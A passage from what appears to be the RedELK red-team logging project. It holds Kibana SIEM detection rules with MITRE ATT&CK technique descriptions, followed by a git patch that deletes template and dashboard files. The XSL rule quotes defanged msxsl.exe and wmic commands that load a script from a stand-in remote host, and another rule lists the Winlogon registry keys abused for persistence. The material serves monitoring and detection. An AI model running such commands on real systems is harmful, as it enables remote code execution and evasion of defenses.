Web shell client).[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1100","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1100] Web Shell","query":"threat.technique.id: T1100","references":["https://attack.mitre.org/techniques/T1100","https://attack.mitre.org/techniques/T1505/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1100","name":"Web Shell","id":"T1100"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1100","name":"Web Shell","id":"T1100"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) [1] and Remote Procedure Call Service (RPCS) [2] for remote access. RPCS operates over port 135. [3]\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. [4] [5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1047","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1047] Windows Management Instrumentation","query":"threat.technique.id: T1047","references":["https://attack.mitre.org/techniques/T1047"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1047","name":"Windows Management Instrumentation","id":"T1047"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB,[1] to interact with systems using remote procedure calls (RPCs),[2] transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1077","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1077] Windows Admin Shares","query":"threat.technique.id: T1077","references":["https://attack.mitre.org/techniques/T1077","https://attack.mitre.org/techniques/T1021/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1077","name":"Windows Admin Shares","id":"T1077"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. [1]\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. [2] [3] Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. [4] [5]\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1084","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1084] Windows Management Instrumentation Event Subscription","query":"threat.technique.id: T1084","references":["https://attack.mitre.org/techniques/T1084","https://attack.mitre.org/techniques/T1546/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1084","name":"Windows Management Instrumentation Event Subscription","id":"T1084"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).[1] It may be called with the winrm command or by any number of programs such as PowerShell.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1028","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1028] Windows Remote Management","query":"threat.technique.id: T1028","references":["https://attack.mitre.org/techniques/T1028","https://attack.mitre.org/techniques/T1021/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1028","name":"Windows Remote Management","id":"T1028"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1028","name":"Windows Remote Management","id":"T1028"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. [1]\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) [2] can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. [3] Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. [4] Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.[5]\nCommand-line examples:[3][5]\nmsxsl.exe customers[.]xml script[.]xsl\nmsxsl.exe script[.]xsl script[.]xsl\nmsxsl.exe script[.]jpeg script[.]jpeg\nAnother variation of this technique, dubbed \"Squiblytwo\", involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.[6] This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.[5]\nCommand-line examples:[5][6]\nLocal File: wmic process list /FORMAT:evil[.]xsl\nRemote File: wmic os get /FORMAT:\"https[:]//example[.]com/evil[.]xsl\"","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1220","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1220] XSL Script Processing","query":"threat.technique.id: T1220","references":["https://attack.mitre.org/techniques/T1220"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1220","name":"XSL Script Processing","id":"T1220"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1220","name":"XSL Script Processing","id":"T1220"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\Wow6432Node\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. [1]\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: [1]\nWinlogon\\Notify - points to notification package DLLs that handle Winlogon events\nWinlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\nWinlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1004","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1004] Winlogon Helper DLL","query":"threat.technique.id: T1004","references":["https://attack.mitre.org/techniques/T1004","https://attack.mitre.org/techniques/T1547/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1004","name":"Winlogon Helper DLL","id":"T1004"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} From 4008304606432abca640314b28b8ed27eb41e308 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sat, 19 Feb 2022 14:45:57 +0100 Subject: [PATCH 15/18] Revert "update of ES and Kibana templates" This reverts commit 67c09b9681d3470a55bd472bd33ff3b3cad36be0. --- .../diff/redelk_kibana_dashboard.json | 2225 ----- ...lk_kibana_index-pattern_.siem-signals.json | 8685 ----------------- ...redelk_kibana_index-pattern_bluecheck.json | 24 - ...delk_kibana_index-pattern_credentials.json | 886 -- .../redelk_kibana_index-pattern_email.json | 2842 ------ ...edelk_kibana_index-pattern_implantsdb.json | 1895 ---- .../redelk_kibana_index-pattern_iplist.json | 146 - .../redelk_kibana_index-pattern_redelk.json | 222 - ...elk_kibana_index-pattern_redirtraffic.json | 25 - .../redelk_kibana_index-pattern_rtops.json | 25 - .../diff/redelk_kibana_search.json | 1188 --- .../diff/redelk_kibana_visualization.json | 5064 ---------- .../redelk_elasticsearch_ilm.json | 1 - ...delk_elasticsearch_template_bluecheck.json | 154 - ...lk_elasticsearch_template_credentials.json | 354 - .../redelk_elasticsearch_template_email.json | 827 -- ...elk_elasticsearch_template_implantsdb.json | 904 -- .../redelk_elasticsearch_template_iplist.json | 61 - .../redelk_elasticsearch_template_redelk.json | 100 - ...k_elasticsearch_template_redirtraffic.json | 759 -- .../redelk_elasticsearch_template_rtops.json | 864 -- .../redelk_kibana_dashboard.ndjson | 12 - ..._kibana_index-pattern_.siem-signals.ndjson | 1 - ...delk_kibana_index-pattern_bluecheck.ndjson | 1 - ...lk_kibana_index-pattern_credentials.ndjson | 1 - .../redelk_kibana_index-pattern_email.ndjson | 1 - ...elk_kibana_index-pattern_implantsdb.ndjson | 1 - ..._kibana_index-pattern_redelk-iplist.ndjson | 1 - .../redelk_kibana_index-pattern_redelk.ndjson | 1 - ...k_kibana_index-pattern_redirtraffic.ndjson | 1 - .../redelk_kibana_index-pattern_rtops.ndjson | 1 - .../redelk_kibana_search.ndjson | 16 - .../redelk_kibana_settings.json | 13 - .../redelk_kibana_visualization.ndjson | 47 - .../redelk_siem_detection_rules.ndjson | 266 - 35 files changed, 27614 deletions(-) delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_.siem-signals.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_dashboard.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson delete mode 100644 elkserver/docker/redelk-base/redelkinstalldata/redelk_siem_detection_rules.ndjson diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json deleted file mode 100644 index 27348d65..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_dashboard.json +++ /dev/null @@ -1,2225 +0,0 @@ -[ - { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "93f74516-7d73-4db3-8d64-589dfd7492b7", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "93f74516-7d73-4db3-8d64-589dfd7492b7", - "panelRefName": "panel_93f74516-7d73-4db3-8d64-589dfd7492b7", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "66e33663-63c3-4e78-aa5d-725e33754c02", - "w": 48, - "x": 0, - "y": 2 - }, - "panelIndex": "66e33663-63c3-4e78-aa5d-725e33754c02", - "panelRefName": "panel_66e33663-63c3-4e78-aa5d-725e33754c02", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", - "w": 8, - "x": 0, - "y": 4 - }, - "panelIndex": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", - "panelRefName": "panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "86117a55-669e-4d4d-a4d6-436da4f1a930", - "w": 8, - "x": 8, - "y": 4 - }, - "panelIndex": "86117a55-669e-4d4d-a4d6-436da4f1a930", - "panelRefName": "panel_86117a55-669e-4d4d-a4d6-436da4f1a930", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "ab07bed8-9d4e-409c-b3db-d15124eb5467", - "w": 8, - "x": 16, - "y": 4 - }, - "panelIndex": "ab07bed8-9d4e-409c-b3db-d15124eb5467", - "panelRefName": "panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "019655aa-c9de-444a-a4af-619b7297572b", - "w": 8, - "x": 24, - "y": 4 - }, - "panelIndex": "019655aa-c9de-444a-a4af-619b7297572b", - "panelRefName": "panel_019655aa-c9de-444a-a4af-619b7297572b", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "43a0761e-49bc-4846-9956-04a604b063ec", - "w": 16, - "x": 32, - "y": 4 - }, - "panelIndex": "43a0761e-49bc-4846-9956-04a604b063ec", - "panelRefName": "panel_43a0761e-49bc-4846-9956-04a604b063ec", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "eab2038d-128a-4b5b-8a72-701fd3f53bd8", - "w": 8, - "x": 0, - "y": 13 - }, - "panelIndex": "eab2038d-128a-4b5b-8a72-701fd3f53bd8", - "panelRefName": "panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "e18544fe-ac30-43cf-891c-4448ffea6bbd", - "w": 8, - "x": 8, - "y": 13 - }, - "panelIndex": "e18544fe-ac30-43cf-891c-4448ffea6bbd", - "panelRefName": "panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", - "w": 16, - "x": 16, - "y": 13 - }, - "panelIndex": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", - "panelRefName": "panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", - "title": "Compromised realms", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "223951c1-7fe0-40f9-9a89-0c91aedd7fce", - "w": 8, - "x": 32, - "y": 13 - }, - "panelIndex": "223951c1-7fe0-40f9-9a89-0c91aedd7fce", - "panelRefName": "panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "c15dc2cd-fad3-44a3-b127-1cd47d837740", - "w": 8, - "x": 40, - "y": 13 - }, - "panelIndex": "c15dc2cd-fad3-44a3-b127-1cd47d837740", - "panelRefName": "panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", - "type": "visualization", - "version": "7.8.0" - } - ], - "refreshInterval": { - "pause": true, - "value": 0 - }, - "timeFrom": "now-12M", - "timeRestore": true, - "timeTo": "now", - "title": "RedELK - Summary dashboard", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "02486040-d355-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", - "type": "visualization" - }, - { - "id": "45491770-0886-11eb-a2d2-171dc8941414", - "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", - "type": "visualization" - }, - { - "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", - "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", - "type": "visualization" - }, - { - "id": "dcf86190-d319-11ea-9301-a30a04251ae9", - "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", - "type": "visualization" - }, - { - "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", - "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", - "type": "visualization" - }, - { - "id": "389dddc0-d317-11ea-9301-a30a04251ae9", - "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", - "type": "visualization" - }, - { - "id": "ce581930-d361-11ea-9301-a30a04251ae9", - "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", - "type": "visualization" - }, - { - "id": "57626ad0-d355-11ea-9301-a30a04251ae9", - "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", - "type": "visualization" - }, - { - "id": "464660c0-d360-11ea-9301-a30a04251ae9", - "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", - "type": "visualization" - }, - { - "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", - "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", - "type": "visualization" - }, - { - "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", - "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", - "type": "visualization" - }, - { - "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", - "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", - "type": "visualization" - } - ], - "sort": [ - 1642171876916, - 34 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757", - "panelRefName": "panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 6, - "i": "09cb7bd6-8162-4141-8a0c-807ee57a4603", - "w": 24, - "x": 0, - "y": 2 - }, - "panelIndex": "09cb7bd6-8162-4141-8a0c-807ee57a4603", - "panelRefName": "panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", - "title": "Target host(s) and user(s) filter", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 6, - "i": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089", - "w": 12, - "x": 24, - "y": 2 - }, - "panelIndex": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089", - "panelRefName": "panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", - "title": "Implants per host", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 6, - "i": "47710d04-18f9-4563-bf0d-73b4dc24f9e5", - "w": 12, - "x": 36, - "y": 2 - }, - "panelIndex": "47710d04-18f9-4563-bf0d-73b4dc24f9e5", - "panelRefName": "panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", - "title": "Implants per user", - "type": "visualization", - "version": "7.10.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 51, - "i": "30674424-d470-4b93-80c1-260d16f987ab", - "w": 48, - "x": 0, - "y": 8 - }, - "panelIndex": "30674424-d470-4b93-80c1-260d16f987ab", - "panelRefName": "panel_30674424-d470-4b93-80c1-260d16f987ab", - "type": "search", - "version": "7.10.0" - } - ], - "timeRestore": false, - "title": "RedELK - Red Team Operations", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "04b87c50-d028-11ea-9301-a30a04251ae9", - "migrationVersion": { - "dashboard": "7.16.0" - }, - "references": [ - { - "id": "0f82b540-d237-11ea-9301-a30a04251ae9", - "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", - "type": "visualization" - }, - { - "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", - "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", - "type": "visualization" - }, - { - "id": "632081a0-d02a-11ea-9301-a30a04251ae9", - "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", - "type": "visualization" - }, - { - "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", - "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", - "type": "visualization" - }, - { - "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", - "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", - "type": "search" - } - ], - "sort": [ - 1642171876916, - 40 - ], - "type": "dashboard", - "version": "1" - }, - { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 2, - "i": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", - "panelRefName": "panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 9, - "i": "ecf77ead-e22f-4708-addf-0cbaaeb6fced", - "w": 24, - "x": 0, - "y": 2 - }, - "panelIndex": "ecf77ead-e22f-4708-addf-0cbaaeb6fced", - "panelRefName": "panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", - "title": "Techniques, Tactics and Procedures", - "type": "visualization", - "version": "7.8.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 18, - "i": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826", - "w": 24, - "x": 24, - "y": 2 - }, - "panelIndex": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826", - "panelRefName": 